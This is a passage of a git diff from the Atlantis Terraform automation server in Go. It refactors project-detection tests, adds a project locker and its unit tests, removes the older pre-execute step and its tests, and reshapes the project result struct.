- []string{"env/a.tfvars"},
+ []string{"env/staging.tfvars"},
[]string{"."},
- "",
+ envDir,
},
{
"Should de-duplicate when multiple files changed in the same dir",
- []string{"root.tf", "env/env.tfvars", "parent/parent.tf", "parent/parent2.tf", "parent/child/child.tf", "parent/child/env/env.tfvars"},
- []string{".", "parent", "parent/child"},
+ []string{"env/staging.tfvars", "main.tf", "other.tf"},
+ []string{"."},
+ "",
+ },
+ {
+ "Should ignore changes in a dir that was deleted",
+ []string{"wasdeleted/main.tf"},
+ []string{},
"",
},
}
for _, c := range cases {
- t.Log(c.description)
- projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir)
-
- // Extract the paths from the projects. We use a slice here instead of a
- // map so we can test whether there are duplicates returned.
- var paths []string
- for _, project := range projects {
- paths = append(paths, project.Path)
- // Check that the project object has the repo set properly.
- Equals(t, modifiedRepo, project.RepoFullName)
- }
- Assert(t, len(c.expProjectPaths) == len(paths),
- "exp %d paths but found %d. They were %v", len(c.expProjectPaths), len(paths), paths)
-
- for _, expPath := range c.expProjectPaths {
- found := false
- for _, actPath := range paths {
- if expPath == actPath {
- found = true
- break
+ t.Run(c.description, func(t *testing.T) {
+ projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir)
+
+ // Extract the paths from the projects. We use a slice here instead of a
+ // map so we can test whether there are duplicates returned.
+ var paths []string
+ for _, project := range projects {
+ paths = append(paths, project.Path)
+ // Check that the project object has the repo set properly.
+ Equals(t, modifiedRepo, project.RepoFullName)
+ }
+ Assert(t, len(c.expProjectPaths) == len(paths),
+ "exp %q but found %q", c.expProjectPaths, paths)
+
+ for _, expPath := range c.expProjectPaths {
+ found := false
+ for _, actPath := range paths {
+ if expPath == actPath {
+ found = true
+ break
+ }
+ }
+ if !found {
+ t.Fatalf("exp %q but was not in paths %v", expPath, paths)
}
}
- if !found {
- t.Fatalf("exp %q but was not in paths %v", expPath, paths)
+ })
+ }
+}
+
+func TestDefaultProjectFinder_DetermineProjectsViaConfig(t *testing.T) {
+ /*
+ Create dir structure:
+
+ main.tf
+ project1/
+ main.tf
+ project2/
+ main.tf
+ modules/
+ module/
+ main.tf
+ */
+ tmpDir, cleanup := DirStructure(t, map[string]interface{}{
+ "main.tf": nil,
+ "project1": map[string]interface{}{
+ "main.tf": nil,
+ },
+ "project2": map[string]interface{}{
+ "main.tf": nil,
+ },
+ "modules": map[string]interface{}{
+ "module": map[string]interface{}{
+ "main.tf": nil,
+ },
+ },
+ })
+ defer cleanup()
+
+ cases := []struct {
+ description string
+ config valid.Config
+ modified []string
+ expProjPaths []string
+ }{
+ {
+ description: "autoplan disabled",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Autoplan: valid.Autoplan{
+ Enabled: false,
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: nil,
+ },
+ {
+ description: "autoplan default",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: []string{"."},
+ },
+ {
+ description: "parent dir modified",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: "project",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: nil,
+ },
+ {
+ description: "parent dir modified matches",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: "project1",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"../**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: []string{"project1"},
+ },
+ {
+ description: "dir deleted",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: "project3",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"project3/main.tf"},
+ expProjPaths: nil,
+ },
+ {
+ description: "multiple projects",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"*.tf"},
+ },
+ },
+ {
+ Dir: "project1",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"../modules/module/*.tf", "**/*.tf"},
+ },
+ },
+ {
+ Dir: "project2",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf", "modules/module/another.tf", "project2/nontf.txt"},
+ expProjPaths: []string{".", "project1"},
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ pf := events.DefaultProjectFinder{}
+ projects, err := pf.DetermineProjectsViaConfig(logging.NewNoopLogger(), c.modified, c.config, tmpDir)
+ Ok(t, err)
+ Equals(t, len(c.expProjPaths), len(projects))
+ for i, proj := range projects {
+ Equals(t, c.expProjPaths[i], proj.Dir)
}
- }
+ })
}
}
diff --git a/server/events/project_locker.go b/server/events/project_locker.go
new file mode 100644
index 0000000000..e6983d5c06
--- /dev/null
+++ b/server/events/project_locker.go
@@ -0,0 +1,82 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+
+ "github.com/runatlantis/atlantis/server/events/locking"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker
+
+// ProjectLocker locks this project against other plans being run until this
+// project is unlocked.
+type ProjectLocker interface {
+ // TryLock attempts to acquire the lock for this project. It returns true if the lock
+ // was acquired. If it returns false, the lock was not acquired and the second
+ // return value will be a string describing why the lock was not acquired.
+ // The third return value is a function that can be called to unlock the
+ // lock. It will only be set if the lock was acquired. Any errors will set
+ // error.
+ TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error)
+}
+
+// DefaultProjectLocker implements ProjectLocker.
+type DefaultProjectLocker struct {
+ Locker locking.Locker
+}
+
+// TryLockResponse is the result of trying to lock a project.
+type TryLockResponse struct {
+ // LockAcquired is true if the lock was acquired.
+ LockAcquired bool
+ // LockFailureReason is the reason why the lock was not acquired. It will
+ // only be set if LockAcquired is false.
+ LockFailureReason string
+ // UnlockFn will unlock the lock created by the caller. This might be called
+ // if there is an error later and the caller doesn't want to continue to
+ // hold the lock.
+ UnlockFn func() error
+ // LockKey is the key for the lock if the lock was acquired.
+ LockKey string
+}
+
+// TryLock implements ProjectLocker.TryLock.
+func (p *DefaultProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) {
+ lockAttempt, err := p.Locker.TryLock(project, workspace, pull, user)
+ if err != nil {
+ return nil, err
+ }
+ if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != pull.Num {
+ failureMsg := fmt.Sprintf(
+ "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
+ lockAttempt.CurrLock.Pull.Num)
+ return &TryLockResponse{
+ LockAcquired: false,
+ LockFailureReason: failureMsg,
+ }, nil
+ }
+ log.Info("acquired lock with id %q", lockAttempt.LockKey)
+ return &TryLockResponse{
+ LockAcquired: true,
+ UnlockFn: func() error {
+ _, err := p.Locker.Unlock(lockAttempt.LockKey)
+ return err
+ },
+ LockKey: lockAttempt.LockKey,
+ }, nil
+}
diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go
new file mode 100644
index 0000000000..232e144f50
--- /dev/null
+++ b/server/events/project_locker_test.go
@@ -0,0 +1,129 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "testing"
+
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/locking"
+ "github.com/runatlantis/atlantis/server/events/locking/mocks"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectLocker_TryLockWhenLocked(t *testing.T) {
+ mockLocker := mocks.NewMockLocker()
+ locker := events.DefaultProjectLocker{
+ Locker: mockLocker,
+ }
+ expProject := models.Project{}
+ expWorkspace := "default"
+ expPull := models.PullRequest{}
+ expUser := models.User{}
+
+ lockingPull := models.PullRequest{
+ Num: 2,
+ }
+ When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+ locking.TryLockResponse{
+ LockAcquired: false,
+ CurrLock: models.ProjectLock{
+ Pull: lockingPull,
+ },
+ LockKey: "",
+ },
+ nil,
+ )
+ res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+ Ok(t, err)
+ Equals(t, &events.TryLockResponse{
+ LockAcquired: false,
+ LockFailureReason: "This project is currently locked by #2. The locking plan must be applied or discarded before future plans can execute.",
+ }, res)
+}
+
+func TestDefaultProjectLocker_TryLockWhenLockedSamePull(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockLocker := mocks.NewMockLocker()
+ locker := events.DefaultProjectLocker{
+ Locker: mockLocker,
+ }
+ expProject := models.Project{}
+ expWorkspace := "default"
+ expPull := models.PullRequest{Num: 2}
+ expUser := models.User{}
+
+ lockingPull := models.PullRequest{
+ Num: 2,
+ }
+ lockKey := "key"
+ When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+ locking.TryLockResponse{
+ LockAcquired: false,
+ CurrLock: models.ProjectLock{
+ Pull: lockingPull,
+ },
+ LockKey: lockKey,
+ },
+ nil,
+ )
+ res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+ Ok(t, err)
+ Equals(t, true, res.LockAcquired)
+
+ // UnlockFn should work.
+ mockLocker.VerifyWasCalled(Never()).Unlock(lockKey)
+ err = res.UnlockFn()
+ Ok(t, err)
+ mockLocker.VerifyWasCalledOnce().Unlock(lockKey)
+}
+
+func TestDefaultProjectLocker_TryLockUnlocked(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockLocker := mocks.NewMockLocker()
+ locker := events.DefaultProjectLocker{
+ Locker: mockLocker,
+ }
+ expProject := models.Project{}
+ expWorkspace := "default"
+ expPull := models.PullRequest{Num: 2}
+ expUser := models.User{}
+
+ lockingPull := models.PullRequest{
+ Num: 2,
+ }
+ lockKey := "key"
+ When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+ locking.TryLockResponse{
+ LockAcquired: true,
+ CurrLock: models.ProjectLock{
+ Pull: lockingPull,
+ },
+ LockKey: lockKey,
+ },
+ nil,
+ )
+ res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+ Ok(t, err)
+ Equals(t, true, res.LockAcquired)
+
+ // UnlockFn should work.
+ mockLocker.VerifyWasCalled(Never()).Unlock(lockKey)
+ err = res.UnlockFn()
+ Ok(t, err)
+ mockLocker.VerifyWasCalledOnce().Unlock(lockKey)
+}
diff --git a/server/events/project_pre_execute.go b/server/events/project_pre_execute.go
deleted file mode 100644
index b9f1625336..0000000000
--- a/server/events/project_pre_execute.go
+++ /dev/null
@@ -1,140 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "path/filepath"
- "strings"
-
- "github.com/hashicorp/go-version"
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/locking"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
- "github.com/runatlantis/atlantis/server/events/terraform"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_pre_executor.go ProjectPreExecutor
-
-// ProjectPreExecutor executes before the plan and apply executors. It handles
-// the setup tasks that are common to both plan and apply.
-type ProjectPreExecutor interface {
- // Execute executes the pre plan/apply tasks.
- Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult
-}
-
-// DefaultProjectPreExecutor implements ProjectPreExecutor.
-type DefaultProjectPreExecutor struct {
- Locker locking.Locker
- ConfigReader ProjectConfigReader
- Terraform terraform.Client
- Run run.Runner
-}
-
-// PreExecuteResult is the result of running the pre execute.
-type PreExecuteResult struct {
- ProjectResult ProjectResult
- ProjectConfig ProjectConfig
- TerraformVersion *version.Version
- LockResponse locking.TryLockResponse
-}
-
-// Execute executes the pre plan/apply tasks.
-func (p *DefaultProjectPreExecutor) Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult {
- workspace := ctx.Command.Workspace
- lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User)
- if err != nil {
- return PreExecuteResult{ProjectResult: ProjectResult{Error: errors.Wrap(err, "acquiring lock")}}
- }
- if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num {
- return PreExecuteResult{ProjectResult: ProjectResult{Failure: fmt.Sprintf(
- "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
- lockAttempt.CurrLock.Pull.Num)}}
- }
- ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey)
- config, tfVersion, err := p.executeWithLock(ctx, repoDir, project)
- if err != nil {
- p.Locker.Unlock(lockAttempt.LockKey) // nolint: errcheck
- return PreExecuteResult{ProjectResult: ProjectResult{Error: err}}
- }
- return PreExecuteResult{ProjectConfig: config, TerraformVersion: tfVersion, LockResponse: lockAttempt}
-}
-
-// executeWithLock executes the pre plan/apply tasks after the lock has been
-// acquired. This helper func makes revoking the lock on error easier.
-// Returns the project config, terraform version, or an error.
-func (p *DefaultProjectPreExecutor) executeWithLock(ctx *CommandContext, repoDir string, project models.Project) (ProjectConfig, *version.Version, error) {
- workspace := ctx.Command.Workspace
-
- // Check if config file is found, if not we continue the run.
- var config ProjectConfig
- absolutePath := filepath.Join(repoDir, project.Path)
- if p.ConfigReader.Exists(absolutePath) {
- var err error
- config, err = p.ConfigReader.Read(absolutePath)
- if err != nil {
- return config, nil, err
- }
- ctx.Log.Info("parsed atlantis config file in %q", absolutePath)
- }
-
- // Check if terraform version is >= 0.9.0.
- terraformVersion := p.Terraform.Version()
- if config.TerraformVersion != nil {
- terraformVersion = config.TerraformVersion
- }
- constraints, _ := version.NewConstraint(">= 0.9.0")
- if constraints.Check(terraformVersion) {
- ctx.Log.Info("determined that we are running terraform with version >= 0.9.0. Running version %s", terraformVersion)
- if len(config.PreInit) > 0 {
- _, err := p.Run.Execute(ctx.Log, config.PreInit, absolutePath, workspace, terraformVersion, "pre_init")
- if err != nil {
- return config, nil, errors.Wrapf(err, "running %s commands", "pre_init")
- }
- }
- _, err := p.Terraform.Init(ctx.Log, absolutePath, workspace, config.GetExtraArguments("init"), terraformVersion)
- if err != nil {
- return config, nil, err
- }
- } else {
- ctx.Log.Info("determined that we are running terraform with version < 0.9.0. Running version %s", terraformVersion)
- if len(config.PreGet) > 0 {
- _, err := p.Run.Execute(ctx.Log, config.PreGet, absolutePath, workspace, terraformVersion, "pre_get")
- if err != nil {
- return config, nil, errors.Wrapf(err, "running %s commands", "pre_get")
- }
- }
- terraformGetCmd := append([]string{"get", "-no-color"}, config.GetExtraArguments("get")...)
- _, err := p.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, terraformGetCmd, terraformVersion, workspace)
- if err != nil {
- return config, nil, err
- }
- }
-
- stage := fmt.Sprintf("pre_%s", strings.ToLower(ctx.Command.Name.String()))
- var commands []string
- if ctx.Command.Name == Plan {
- commands = config.PrePlan
- } else {
- commands = config.PreApply
- }
- if len(commands) > 0 {
- _, err := p.Run.Execute(ctx.Log, commands, absolutePath, workspace, terraformVersion, stage)
- if err != nil {
- return config, nil, errors.Wrapf(err, "running %s commands", stage)
- }
- }
- return config, terraformVersion, nil
-}
diff --git a/server/events/project_pre_execute_test.go b/server/events/project_pre_execute_test.go
deleted file mode 100644
index 27814055f2..0000000000
--- a/server/events/project_pre_execute_test.go
+++ /dev/null
@@ -1,282 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "errors"
- "testing"
-
- "github.com/hashicorp/go-version"
- "github.com/mohae/deepcopy"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server/events"
- "github.com/runatlantis/atlantis/server/events/locking"
- lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
- "github.com/runatlantis/atlantis/server/events/mocks"
- "github.com/runatlantis/atlantis/server/events/models"
- rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
- tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
- "github.com/runatlantis/atlantis/server/logging"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var ctx = events.CommandContext{
- Command: &events.Command{
- Name: events.Plan,
- },
- Log: logging.NewNoopLogger(),
-}
-var project = models.Project{}
-
-func TestExecute_LockErr(t *testing.T) {
- t.Log("when there is an error returned from TryLock we return it")
- p, l, _, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_LockFailed(t *testing.T) {
- t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error")
- p, l, _, _ := setupPreExecuteTest(t)
- // The response has LockAcquired: false and the pull request is a number
- // different than the current pull.
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: false,
- CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}},
- }, nil)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure)
-}
-
-func TestExecute_ConfigErr(t *testing.T) {
- t.Log("when there is an error loading config, we return it")
- p, l, _, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreInitErr(t *testing.T) {
- t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it")
- p, l, tm, r := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
- PreInit: []string{"pre-init"},
- }, nil)
- tfVersion, _ := version.NewVersion("0.9.0")
- When(tm.Version()).ThenReturn(tfVersion)
- When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_InitErr(t *testing.T) {
- t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it")
- p, l, tm, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
- tfVersion, _ := version.NewVersion("0.9.0")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreGetErr(t *testing.T) {
- t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it")
- p, l, tm, r := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
- PreGet: []string{"pre-get"},
- }, nil)
- tfVersion, _ := version.NewVersion("0.8")
- When(tm.Version()).ThenReturn(tfVersion)
- When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_GetErr(t *testing.T) {
- t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it")
- p, l, tm, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
- tfVersion, _ := version.NewVersion("0.8")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreCommandErr(t *testing.T) {
- t.Log("when we get an error running pre commands we return it")
- p, l, tm, r := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
- PrePlan: []string{"command"},
- }, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
- When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_SuccessTF9(t *testing.T) {
- t.Log("when the project is on tf >= 0.9 it should be successful")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PreInit: []string{"pre-init"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion)
- r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")
-}
-
-func TestExecute_SuccessTF8(t *testing.T) {
- t.Log("when the project is on tf < 0.9 it should be successful")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PreGet: []string{"pre-get"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.8")
- When(tm.Version()).ThenReturn(tfVersion)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")
- r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")
-}
-
-func TestExecute_SuccessPrePlan(t *testing.T) {
- t.Log("when there are pre_plan commands they are run")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PrePlan: []string{"command"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")
-}
-
-func TestExecute_SuccessPreApply(t *testing.T) {
- t.Log("when there are pre_apply commands they are run")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PreApply: []string{"command"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
-
- cpCtx := deepcopy.Copy(ctx).(events.CommandContext)
- cpCtx.Command = &events.Command{
- Name: events.Apply,
- }
- cpCtx.Log = logging.NewNoopLogger()
-
- res := p.Execute(&cpCtx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply")
-}
-
-func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectPreExecutor, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) {
- RegisterMockTestingT(t)
- l := lmocks.NewMockLocker()
- cr := mocks.NewMockProjectConfigReader()
- tm := tmocks.NewMockClient()
- r := rmocks.NewMockRunner()
- return &events.DefaultProjectPreExecutor{
- Locker: l,
- ConfigReader: cr,
- Terraform: tm,
- Run: r,
- }, l, tm, r
-}
diff --git a/server/events/project_result.go b/server/events/project_result.go
index 94a6d3a468..80a3041aaf 100644
--- a/server/events/project_result.go
+++ b/server/events/project_result.go
@@ -17,7 +17,12 @@ import "github.com/runatlantis/atlantis/server/events/vcs"
// ProjectResult is the result of executing a plan/apply for a project.
type ProjectResult struct {
- Path string
+ ProjectCommandResult
+ RepoRelDir string
+ Workspace string
+}
+
+type ProjectCommandResult struct {
Error error
Failure string
PlanSuccess *PlanSuccess
diff --git a/server/events/pull_closed_executor.go b/server/events/pull_closed_executor.go
index 79dadeff0f..ec3ce6f825 100644
--- a/server/events/pull_closed_executor.go
+++ b/server/events/pull_closed_executor.go
@@ -38,24 +38,24 @@ type PullCleaner interface {
// PullClosedExecutor executes the tasks required to clean up a closed pull
// request.
type PullClosedExecutor struct {
- Locker locking.Locker
- VCSClient vcs.ClientProxy
- Workspace AtlantisWorkspace
+ Locker locking.Locker
